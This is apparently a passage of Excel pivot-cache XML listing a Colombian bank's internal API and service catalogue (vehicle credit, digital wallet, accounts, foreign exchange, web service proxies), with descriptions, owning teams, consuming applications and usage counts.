    <s v="El proceso de Estudio Preliminar, permite el registro de la información de los datos básicos del cliente, actividad económica, datos del vehí­culo y datos propios del comercio para realizar la ejecución del estudio preliminar para el crédito de véhiculo y obtener una aprobación parcial y permitir continuar con el proceso final del estudio."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="Carventuri _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="4917"/>
    <n v="7617"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-06T02:02:55"/>
    <s v="Vehicle Credit Study"/>
    <n v="106"/>
    <s v="Vehicle Credit - Preliminary Study"/>
    <n v="106"/>
    <s v="vehicle-credit-preliminary-study"/>
    <s v="El proceso de Estudio Preliminar, permite el registro de la información de los datos básicos del cliente, actividad económica, datos del vehí­culo y datos propios del comercio para realizar la ejecución del estudio preliminar para el crédito de véhiculo y obtener una aprobación parcial y permitir continuar con el proceso final del estudio."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_AAA _x000d__x000a_ CarventuriApiVehiculos_AW1097001 _x000d__x000a_ PuntoAliadoApiVehiculos_AW1097001"/>
    <n v="62"/>
    <n v="71"/>
    <n v="88"/>
    <n v="49"/>
    <n v="57"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-02-23T15:34:03"/>
    <s v="Vehicle Credit Study"/>
    <n v="106"/>
    <s v="Vehicle Credit Study - Authorization"/>
    <n v="100"/>
    <s v="vehicle-credit-study-authorization"/>
    <s v="Proveedor de OAuth2 para autorización de las APIs de estudio de crédito de vehí­culo"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_AAA _x000d__x000a_ CarventuriApiVehiculos_AW1097001 _x000d__x000a_ PuntoAliadoApiVehiculos_AW1097001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-12-28T17:51:59"/>
    <s v="Vehicle Loan Sufi"/>
    <n v="100"/>
    <s v="Vehicle Information"/>
    <n v="100"/>
    <s v="vehicle-information"/>
    <s v="API que ofrece capacidades sobre el vehí­culo para el cual fue aprobado un crédito como la consulta de la información del vehí­culo, el registro, consulta y levantamiento de contrato de prenda en las secretarias de transito de Colombia, de manera que se puedan adelantar cualquier tipo de tramites en lí­nea."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="Tramites_Digitales_AW1081001_SUFI_APM _x000d__x000a_ Monitoreo_AW1081001"/>
    <n v="104"/>
    <n v="7159"/>
    <n v="7318"/>
    <n v="6270"/>
    <n v="10197"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Vender Divisas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Soportar la funcionalidad de negociaciones de Divisas realizadas entre el banco y sus clientes."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Tesoreria"/>
    <s v="Tesoreria"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Murex_MUREX-CORE_AW0434001"/>
    <s v="SVE _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Verificacion Codigo Autorizacion"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Verificación Código Autorización permite a los consumidores hacer la validación del código de autorización retornado en el proceso de autenticación de un cliente, para garantizar el acceso a diferentes funcionalidades. _x005f_x000D_ Actualmente Implementado en IIB10"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="AW1189001 _x000d__x000a_BIM"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Verificar Producto"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Para el proceso de autogestión que realizan los clientes desde la sucursal virtual (eBanking), se requiere poder verificar en el HUB de Información si un determinado producto pertenece a un cliente."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="HUB"/>
    <s v="AW0718001 _x000d__x000a_AW0227001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-09T16:31:42"/>
    <s v="Wallet"/>
    <n v="201"/>
    <s v="Wallet - Transactional Log"/>
    <n v="201"/>
    <s v="wallet-transactional-log"/>
    <s v="Con esta API se permitirá consultar la información de las novedades aplicadas de los clientes registrados en la Nueva Billetera.   Estas novedades incluyen:   - Registro del cliente en la billetera - Tarjetas del cliente en la billetera  - Tarjetas activas del cliente en la billetera - Tarjetas visibles del cliente en la billetera  - Tarjetas ocultas del cliente en la billetera - Tarjeta seleccionada como favorita por el cliente en la billetera (para pagos con NFC)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="23"/>
    <n v="66"/>
    <n v="49"/>
    <n v="9"/>
    <n v="6"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-09T16:43:18"/>
    <s v="Wallet Customers"/>
    <n v="200"/>
    <s v="Wallet Customers - Cards"/>
    <n v="200"/>
    <s v="wallet-customers-cards"/>
    <s v="Con esta API se permitirá consultar la información de las tarjetas de los clientes registradas en la Nueva Billetera. La bíºsqueda se puede realizar por los datos de identificación del cliente, el identificador de la billetera (wallet ID), o el identificador de la tarjeta en la billetera (card ID). "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="12"/>
    <n v="44"/>
    <n v="259"/>
    <n v="205"/>
    <n v="178"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-19T10:40:44"/>
    <s v="Wallet Customers"/>
    <n v="201"/>
    <s v="Wallet Customers - Cards"/>
    <n v="201"/>
    <s v="wallet-customers-cards"/>
    <s v="Con esta API se permitirá consultar la información de las tarjetas de los clientes registradas en la Nueva Billetera. La bíºsqueda se puede realizar por los datos de identificación del cliente, el identificador de la billetera (wallet ID), o el identificador de la tarjeta en la billetera (card ID). "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="12"/>
    <n v="44"/>
    <n v="259"/>
    <n v="205"/>
    <n v="178"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-09T16:43:18"/>
    <s v="Wallet Customers"/>
    <n v="200"/>
    <s v="Wallet Customers - Enrollment"/>
    <n v="200"/>
    <s v="wallet-customers-enrollment"/>
    <s v="Con esta API se permitirá consultar la información de registro de un cliente en la Nueva Billetera."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="2"/>
    <n v="24"/>
    <n v="77"/>
    <n v="48"/>
    <n v="73"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-19T10:40:44"/>
    <s v="Wallet Customers"/>
    <n v="201"/>
    <s v="Wallet Customers - Enrollment"/>
    <n v="201"/>
    <s v="wallet-customers-enrollment"/>
    <s v="Con esta API se permitirá consultar la información de registro de un cliente en la Nueva Billetera."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="2"/>
    <n v="24"/>
    <n v="77"/>
    <n v="48"/>
    <n v="73"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-09T16:43:18"/>
    <s v="Wallet Customers"/>
    <n v="200"/>
    <s v="Wallet Customers - Enrollment History"/>
    <n v="200"/>
    <s v="wallet-customers-enrollment-history"/>
    <s v="Con esta API se permitirá consultar la información histórica de registro de los clientes en la nueva billetera. Tiene la opción de consultar la información histórica de un cliente (Todas las billeteras que ha tenido), o la consulta de todos los clientes registrados en el canal."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="2"/>
    <n v="22"/>
    <n v="207"/>
    <n v="203"/>
    <n v="178"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-19T10:40:44"/>
    <s v="Wallet Customers"/>
    <n v="201"/>
    <s v="Wallet Customers - Enrollment History"/>
    <n v="201"/>
    <s v="wallet-customers-enrollment-history"/>
    <s v="Con esta API se permitirá consultar la información histórica de registro de los clientes en la nueva billetera. Tiene la opción de consultar la información histórica de un cliente (Todas las billeteras que ha tenido), o la consulta de todos los clientes registrados en el canal."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="2"/>
    <n v="22"/>
    <n v="207"/>
    <n v="203"/>
    <n v="178"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-19T10:40:44"/>
    <s v="Wallet Customers"/>
    <n v="200"/>
    <s v="Wallet Customers - Management"/>
    <n v="200"/>
    <s v="wallet-customers-management"/>
    <s v="Esta API permite exponer las diferentes capacidades para gestionar los clientes en la billetera móvil. Inicialmente, la API tendrá las siguientes capacidades: '¢_x0009_Bloquear o desbloquear por seguridad una billetera de un cliente '¢_x0009_Cancelar definitivamente la billetera si el cliente así­ lo solicita o cuando el área de seguridad detecte una vulnerabilidad (fraude confirmado o movimientos inusuales)."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="1"/>
    <n v="14"/>
    <n v="17"/>
    <n v="9"/>
    <n v="17"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-09T16:43:18"/>
    <s v="Wallet Customers"/>
    <n v="201"/>
    <s v="Wallet Customers - Management"/>
    <n v="201"/>
    <s v="wallet-customers-management"/>
    <s v="Esta API permite exponer las diferentes capacidades para gestionar los clientes en la billetera móvil. Inicialmente, la API tendrá las siguientes capacidades: '¢_x0009_Bloquear o desbloquear por seguridad una billetera de un cliente '¢_x0009_Cancelar definitivamente la billetera si el cliente así­ lo solicita o cuando el área de seguridad detecte una vulnerabilidad (fraude confirmado o movimientos inusuales)."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="1"/>
    <n v="14"/>
    <n v="17"/>
    <n v="9"/>
    <n v="17"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-19T10:40:44"/>
    <s v="Wallet Customers"/>
    <n v="200"/>
    <s v="Wallet Customers - Purchases"/>
    <n v="200"/>
    <s v="wallet-customers-purchases"/>
    <s v="Esta API permite consultar las compras realizadas por los clientes a través de la Nueva Billetera con las tecnologí­as habilitadas para pagos. '¢_x0009_QR '¢_x0009_NFC (Sólo se habilitará cuando se puedan realizar pagos con NFC)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="1"/>
    <n v="64"/>
    <n v="204"/>
    <n v="130"/>
    <n v="137"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-09T16:43:18"/>
    <s v="Wallet Customers"/>
    <n v="201"/>
    <s v="Wallet Customers - Purchases"/>
    <n v="201"/>
    <s v="wallet-customers-purchases"/>
    <s v="Esta API permite consultar las compras realizadas por los clientes a través de la Nueva Billetera con las tecnologí­as habilitadas para pagos. '¢_x0009_QR '¢_x0009_NFC (Sólo se habilitará cuando se puedan realizar pagos con NFC)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Aceptación de Pagos"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="1"/>
    <n v="64"/>
    <n v="204"/>
    <n v="130"/>
    <n v="137"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_ALM"/>
    <m/>
    <m/>
    <s v="Web Service Proxy"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_AXI_AutServidor"/>
    <m/>
    <m/>
    <s v="Web Service Proxy"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_AXI_SincServidor"/>
    <m/>
    <m/>
    <s v="Web Service Proxy"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_AXI_SincServidorV2"/>
    <m/>
    <m/>
    <s v="Web Service Proxy"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_BancaDigital"/>
    <m/>
    <m/>
    <s v="Web Service Proxy"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_CMA_TOKEN"/>
    <m/>
    <m/>
    <s v="Web Service Proxy"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_ERROR_ADAPTER_DP"/>
    <m/>
    <m/>
    <s v="Web Service Proxy"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_GFE_GESTIONFACTURAELECTRONICA_CEN"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_IC_CONSULTARINFORMACIONPRODUCTOCLIENTE_CIPC"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_SAP_ASYNC_EC_TO_ERP"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_SAP_SYNC_EC_TO_ERP"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_SM_AccederMontoPreaprobadoTarjetaCredito_AMPTC"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_SM_RevisarIdentidadCliente_RIC"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_SM_RevisarIdentidadCliente_V2"/>
    <m/>
    <m/>
    <s v="Multi Protocol Gateway"/>
    <s v="ServiciosExternos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_TRF"/>
    <m/>
    <m/>
    <s v="Web Service Proxy"/>
    <s v="Canales"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_VAL_InterfaceCMASeries2"/>
    <m/>
    <m/>
    <s v="Web Service Proxy"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="WSP_VAL_SERIES4"/>
    <m/>
    <m/>
    <s v="Web Service Proxy"/>
    <s v="Productos"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>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9">
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Acceder Acuerdo Trade"/>
    <n v="300"/>
    <x v="0"/>
    <s v="Este Servicio esta Deprecado y no tiene Documentacion"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <s v="FINACLE - COLOMBIA_TRADE_AW0684001"/>
    <s v="AW0718001 _x000d__x000a_AW0504001 _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Acceder Negociaciones De Divisas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite conocer la disponibilidad del banco para hacer la negociación de divisas, acceder a las condiciones que ofrece el banco para efectuarla y consultar la historia de negociaciones realizadas entre el banco y el cliente._x005f_x000D_ "/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Tesoreria"/>
    <x v="1"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="MODULO PARAMETRIZADOR COMPRA Y VENTA DE DIVISAS TESORERIA_AW0899001"/>
    <s v="SVE _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-23T19:01:50"/>
    <s v="Accounts"/>
    <n v="1910"/>
    <s v="Account - Accounts"/>
    <n v="135"/>
    <x v="1"/>
    <s v="Permite conocer la información básica y detallada de las cuentas de ahorro o corrientes de un cliente Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="ConsultaCuentasDepositos/V1.0"/>
    <s v="Depositós"/>
    <s v="BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ CapaTrx_ProductorConsumidor _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Deposits-Openshift_PRODUCTORCONSUMIDOR _x000d__x000a_ FONDOS_AW1365 _x000d__x000a_ Valores_AW1373 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ Horus_AW1258011 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ GESTION DE PRECIOS_NU0091001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ RIGO_NU0135001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Dcmonroy_prueba_paso _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001 _x000d__x000a_ SEG_NU0064001"/>
    <n v="7218059"/>
    <n v="7597970"/>
    <n v="7624365"/>
    <n v="20972492"/>
    <n v="30546239"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-13T14:16:29"/>
    <s v="Accounts AWS"/>
    <n v="110"/>
    <s v="Account - Accounts AWS"/>
    <n v="100"/>
    <x v="2"/>
    <s v="Permite conocer la información básica y detallada de las cuentas de ahorro o corrientes de un cliente Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="ALM_AW0955 _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ LoansOffer_NU0102001"/>
    <n v="49937577"/>
    <n v="41672613"/>
    <n v="3285668"/>
    <n v="53"/>
    <n v="22"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-05-10T22:16:36"/>
    <s v="Accounts"/>
    <n v="130"/>
    <s v="Account - Balances"/>
    <n v="110"/>
    <x v="3"/>
    <s v="La API Account - Balances permitirá a los diferentes consumidores poder obtener los diferentes saldos de manera detallada para los tipos de productos: CAA: Cuentas corrientes, SBA: Cuenta de ahorros que se posee en las Filiales del Exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaSaldosCuentasDepositos/V1.0"/>
    <m/>
    <s v="APP Cayman _x000d__x000a_ Cayman_Soporte _x000d__x000a_ TMP EDIN APP_AW1276001 _x000d__x000a_ TEMP MAM_AW1204 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ TMP1 johucorr_AW0360010 _x000d__x000a_ APOLO_AW0360010 _x000d__x000a_ App inversionesGB_AW1185001"/>
    <n v="1477"/>
    <n v="5"/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-13T14:16:29"/>
    <s v="Accounts AWS"/>
    <n v="110"/>
    <s v="Account - Balances AWS"/>
    <n v="101"/>
    <x v="4"/>
    <s v="Permite realizar las consultas de saldos de una cuenta de depósito, se puede consultar por cuenta o por todas las cuentas de un cliente en particular."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v=""/>
    <m/>
    <s v="ALM_AW0955 _x000d__x000a_ APPVinculation_AW1315014 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ Openshift_AW1333002_AccountCertificates _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ LoansOffer_NU0102001"/>
    <n v="4581"/>
    <n v="3"/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-22T14:55:33"/>
    <s v="Accounts"/>
    <n v="1910"/>
    <s v="Account - Fund Transfers"/>
    <n v="112"/>
